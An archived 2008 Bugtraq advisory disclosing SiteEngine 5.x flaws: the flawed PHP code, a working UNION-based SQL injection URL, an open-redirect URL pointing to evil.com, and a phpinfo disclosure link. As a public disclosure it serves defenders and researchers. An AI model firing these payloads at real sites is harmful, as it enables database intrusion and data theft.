lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 22 Oct 2008 20:45:00 -0600
From: xuanmumu@...il.com
To: bugtraq@...urityfocus.com
Subject: SiteEngine 5.x Multiple Remote Vulnerabilities

Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.

-=0x01=- SQL injection Vulnerability
vul code like this:
if ( intval( $id ) )
{
    require_once( $site_engine_root."lib/rss.php" );
$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";

POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,1
1%20/*
This vulnerability exist in board.php……

-=0x02=- URI Redirection Vulnerability 
POC:
http://www.test.com/api.php?action=logout&forward=http://evil.com

-=0x02=- Information Disclosure Vulnerability 
POC:
http://www.test.com/misc.php?action=php_info

ForFun~

-=EOF=-

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ